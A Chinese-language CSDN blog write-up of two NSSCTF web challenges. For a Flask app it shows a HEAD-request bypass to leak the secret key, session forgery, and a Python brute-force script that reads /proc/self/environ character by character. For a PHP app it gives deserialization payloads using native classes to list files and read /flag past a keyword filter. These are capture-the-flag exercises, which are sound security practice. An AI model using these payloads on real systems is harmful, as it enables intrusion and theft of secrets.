NSSCTF prize_p4-5

最新推荐文章于 2023-03-13 20:48:14 发布
最新推荐文章于 2023-03-13 20:48:14 发布
阅读量479 收藏 1
点赞数
分类专栏: NSSCTF 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/127323880
版权

prize_p4

打开后发现一个url和data登录框,随便输入一下看一看是啥。

发现了一个得到key的方法。

@app.route('/getkey', methods=["GET"])

def getkey():
    
    if request.method != "GET":

       session["key"]=SECRET_KEY

访问/getkey,然后判断是否为GET访问,不是的话就让session[key]等于key。

可以用与GET相似的访问方法HEAD访问,绕过GET判断。

得到key,然后伪造session。

得到源码:

from flask import Flask, request, session, render_template, url_for,redirect,render_template_string

import base64

import urllib.request

import uuid

import flag



SECRET_KEY=str(uuid.uuid4())



app = Flask(__name__)

app.config.update(dict(

    SECRET_KEY=SECRET_KEY,

))



#src in /app



@app.route('/')

@app.route('/index',methods=['GET'])

def index():

    return render_template("index.html")



@app.route('/get_data', methods=["GET",'POST'])

def get_data():

    data = request.form.get('data', '123')

    if type(data) is str:

        data=data.encode('utf8')

    url = request.form.get('url', 'http://127.0.0.1:8888/')

    if data and url:

        session['data'] = data

        session['url'] = url

        session["admin"]=False

        return redirect(url_for('home'))

    return redirect(url_for('/'))



@app.route('/home', methods=["GET"])

def home():

    if session.get("admin",False):

        return render_template_string(open(__file__).read())

    else:

        return render_template("home.html",data=session.get('data','Not find data...'))



@app.route('/getkey', methods=["GET"])

def getkey():

    if request.method != "GET":

        session["key"]=SECRET_KEY

    return render_template_string('''@app.route('/getkey', methods=["GET"])

def getkey():

    if request.method != "GET":

        session["key"]=SECRET_KEY''')



@app.route('/get_hindd_result', methods=["GET"])

def get_hindd_result():

    if session['data'] and session['url']:

        if 'file:' in session['url']:

            return "no no no"

        data=(session['data']).decode('utf8')

        url_text=urllib.request.urlopen(session['url']).read().decode('utf8')

        if url_text in data or data in url_text:

            return "you get it"

    return "what ???"



@app.route('/getflag', methods=["GET"])

def get_flag():

    res = flag.waf(request)

    return res



if __name__ == '__main__':

    app.run(host='0.0.0.0', debug=False, port=8888)

一点一点分析。

1.首先是访问/或者/index,返还渲染后的index.html。

2.访问/get_data,这个没啥特殊的,就是给session中的data和url以及admin赋值,可控。

3.访问/home,判断session中的admin是否为false,不是的话返回源码。

4.访问/getkey,这个就是一个获得key的途径,没啥说的。

5.访问/get_hindd_result,先判断session[url]里是否有file(大写即可绕过),有的话直接返还no no no,否则的话就是给data赋值,然后读取session['url'])文件,值赋给url_text,最后判断data和url_text是否相互包含。

6.访问/getflag,然后是一个waf,返回res。

我的第一想法是从/getflag中得到flag,但由于读取文件后不会回显文件的内容,行不通,想了一想,环境变量中可能存在flag,用NSSCTF试了一下,返回you get it,所以可以直接盲注得到flag,任意文件读取加盲注。

脚本思路:控制session,对flag一个字符一个字符爆破,先访问/get_data,然后得到session后继续访问/get_hindd_result,用回显判断传入的部分flag是否正确,正确的话继续下一个字符的爆破直至到}。(环境变量在文件FILE:///proc/self/environ中)

脚本:

import base64
import requests

s = "}-0123456789abcdefghijklmnopqrstuvwxyz"
flag = 'NSSCTF{'
while 1:
    for i in s:
        temp_flag = flag + i
        data = {'url':'FILE:///proc/self/environ','data': temp_flag,'submit':'%E6%8F%90%E4%BA%A4'}
        res = requests.Session()
        res.get(url='http://1.14.71.254:28556//get_data',data=data)
        #print(str(res.cookies.values())[2:-2])
        result = requests.get(url="http://1.14.71.254:28556//get_hindd_result",cookies={"session": str(res.cookies.values())[2:-2]})
        if "you get it" in result.text:
            flag += i
            print("flag", flag)
            break
    if flag[-1] == '}':
        break

 

prize_p5

php反序列化,php原生类利用。

 

发现了destruct方法直接可以利用php原生类。

 

首先查找flag的位置。

Paylaod:

?cata=O:9:"catalogue":2:{s:5:"class";s:18:"FilesystemIterator";s:4:"data";s:11:"glob:///*f*";}

发现其是/flag文件。

直接读取,发现object被过滤,利用编码绕过即可。

将其中的S大写,然后长度15变回13即可。

Payload:

?cata=O:9:"catalogue":2:{s:5:"class";S:13:"SplFileOb\6Aect";s:4:"data";s:5:"/flag";}

f0njl
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Flask之路由(app.route)详解
m0_67392661的博客
08-01 557
在运行flask程序时通常大部分人操作时和python文件一样运行右击然后run右击run程序出来的结果容易忘记停止并且可能会出现端口堵塞等问题有一种改进方式在下方有一个Terminal(终端)的标识用终端去运行,点击它Ctrl+C快捷键结束print("int类型",nid)return"返回结果是int类型的nid"...
NSSCTF web刷题记录3
最新发布
rev1ve的博客
10-28 610
使用 uniqid() 生成一个唯一的标识符,并将其与 .txt 扩展名拼接为文件名,赋值给变量 $uuid;这里关键是要去得到cookie_secret的值,借助百度,Tornado框架的附属文件handler.settings中存在cookie_secret,修改下payload。我们要把flag复制到app.py,但是我们不知道当前目录是什么,所以多尝试看看需要几个。分别赋值即可绕过,那么我们再来看看date函数,我们本地测试下。,然后结合存在app.py,我们用cp命令把。
路由请求及传递接收参数
qq1244567551的博客
05-04 2389
GET和POST GET:向特定的资源发出请求。 使用场景:如果只对服务器获取数据,并没有对服务器产生任何影响,那么这时候使用get请求 传参:get请求传参是放在url中,并且是通过?的形式来指定key和value的 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。POST请求可能会导致新的资源的创建和/或已有资源的修改。 使用场景:如果要对服务器产...
flask快速入门
qq_43213352的博客
01-27 546
Flask学习笔记 app = Flask(name) app.config 可以定义路由和路由参数 app是应用程序实例. 路由返回字符串或者模版 返回字符串: returen ‘hello world’ 返回模版 : 前提: from flask import render_templates return render_template(‘index.html’) 定义get/put/P...
[NSSCTF]prize_p1~p5五道题学习
m0_62422842的博客
08-11 1899
五道web题涉及到的知识点也比较多,总结一下便于今后学习
[CTFShow] 记一次Flask session伪造
YV_LING的博客
11-13 1791
双十一的时候,ctfshow搞了一个“菜狗杯”比赛,其中有道题印象比较深刻,在此记录一下。
Prize-Promotions_And_Raffle-Drawings-Name-Picker:Figma的线框项目
05-27
奖品及促销欢迎参加小型企业Web应用程序的促销活动。 我是位于巴西的国际大学的系统分析和开发学生。 该项目的目的是开发一个免费的Web应用程序,以帮助小型企业使用随机的名称选择器来举行抽奖活动,并在业务成功...
nprize-read-only.tar.gz_Netflix Prize_Only_RMSE_netflix
09-23
在Netflix Prize中,由于评分通常在1到5星之间,一个较小的RMSE意味着算法能更准确地预测用户对未观看电影的评分,从而提供更个性化的推荐。 Netflix Prize的数据集包含了数百万条匿名用户对电影的评分记录,参赛者...
HYF_nobel-prize:额外的React分配。 客户获得诺贝尔奖名单
04-28
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。 目录 资料夹结构 my-app/ README.md node_modules/ package.json ... 构建生产到应用程序
fsf.rar_prize_一等奖_抽奖_抽奖 delphi_抽奖程序
09-23
《Delphi实现抽奖程序设计详解》 在信息技术领域,抽奖程序是常见的应用之一,尤其在各种活动、会议或促销活动中,用于随机选取获奖者。本文将深入探讨如何使用Delphi编程语言来设计一个公平且高效的抽奖程序,实现...
TI7 Prize pool Tracker-crx插件
04-05
语言:English (UK) 2017年国际邀请赛DotA 2活动的奖池追踪器 这是The International 6 DotA 2事件的奖池追踪器。 它显示当前提出的总数,留给下一个目标,下一个目标的值以及下一个目标是什么。...
NSSCTF刷题记录
kindyyy的博客
03-13 784
NSSctf的刷题记录,有错误欢迎指正
NSSCTF web题记录
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
Flask初探二( app.route 内部实现)
DragonFangQy
06-20 1万+
最小的flask应用 from flask import Flask app = Flask(__name__) @app.route('/') def hello_world(): return 'Hello World!' if __name__ == '__main__': app.run() 上一篇blog 探究了flask 各个参数的作用,本篇将围绕 @app...
NSSCTF Round#7 Team ez_rce和0o0讲解
m0_64815693的博客
01-29 2623
NSSCTF Round#7 Team ez_rce和0o0讲解
NSSCTF—wp
XikX_eleven的博客
09-21 1234
NSSctf wpPrize Problem2 Prize Problem2 根基提示url加/1.zip,下载压缩包 下载速度很慢 做了限制 idm 多线程下载 拉满32
python-web框架Flask-(三)request模块
记录点滴
08-31 8227
request模块方法: 客户端请求,flask中获取客户端的信息,需要用到request 首先要引入模块: from flask import request 1、request.method 查看请求方式 # 用户请求http://localhost:5000/login 会执行下边视图函数 @app.route('/login',methods=['GET','POST...
Python Flask中Request请求
热门推荐
zhangvalue的博客
06-27 1万+
Request是个对象,不管是Python还是Java,虽然request这个对象可能叫的名字不一样,(在其他语言中可能叫HttpRequest)。 当客户端浏览器去访问一个www.baidu.com地址时,Http协议会向服务器传递一个request对象。这个request对象包含了请求头、请求参数、以及请求方式,当然后台可以取到request。然后进行逻辑处理。 HTTP请求(requ...
Bugku-CTF SSTI ——新手ctf记录
xy7850的博客
09-21 901
目录 Simp_SSTI_1 解题过程 ​ Flask默认配置文件: flask查看配置文件的全局变量的playload: 设置secret_key: Simp_SSTI_2 解题过程: ​参考 Simp_SSTI_1 解题过程 进入场景,看到提示,得到第一条信息:参数名为 flag。 习惯性按F12,查看源码 看到新提示,得到第二条信息:需要flask设置secret_key变量 得到flag。 Flask默认配置文件: { 'D...
first_prize_winner = random.choice(first_prize_pool) if first_prize_pool else None #从名单里去掉: for i in range(len(first_prize_pool)): #遍历每一个候选人 if first_prize_pool[i] == first_prize_winner: #除去对应ID的候选人 first_prize_pool.pop(i) 为什么会出现IndexError: list index out of range的报错?
06-11
在你的代码中,当你使用 `pop` 方法从 `first_prize_pool` 列表中删除元素时,会改变列表的长度,从而导致索引错误。具体来说,当你删除一个元素时,原先位于该元素后面的所有元素的索引都会减少1,这将导致在后面的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值